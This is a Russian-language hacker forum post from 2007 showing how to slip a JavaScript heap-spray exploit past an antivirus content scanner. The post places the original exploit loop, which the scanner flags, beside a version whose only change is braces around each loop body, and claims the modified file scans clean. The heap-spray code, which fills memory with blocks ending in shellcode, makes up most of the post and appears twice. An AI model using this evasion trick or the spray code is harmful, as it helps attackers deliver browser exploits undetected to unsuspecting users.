sn0w
18.01.2007, 20:53
Для того чтоб наибсти анализатор контента, например касперычевский (тестил онлайн версию), делаем простой экспанд блочных функций (обычно циклы):
оригинал эксплоита (палится):
...
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<350;i++) memory[i] = block + shellcode;
...
модификация (нипалица):
...
while (bigblock.length<slackspace){bigblock+=bigblock;}
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000){block = block+block+fillblock;}
memory = new Array();
for (i=0;i<350;i++){memory[i] = block + shellcode;}
...
+ тестим...
+ файл чист ;)
оригинал эксплоита (палится):
...
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<350;i++) memory[i] = block + shellcode;
...
модификация (нипалица):
...
while (bigblock.length<slackspace){bigblock+=bigblock;}
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000){block = block+block+fillblock;}
memory = new Array();
for (i=0;i<350;i++){memory[i] = block + shellcode;}
...
+ тестим...
+ файл чист ;)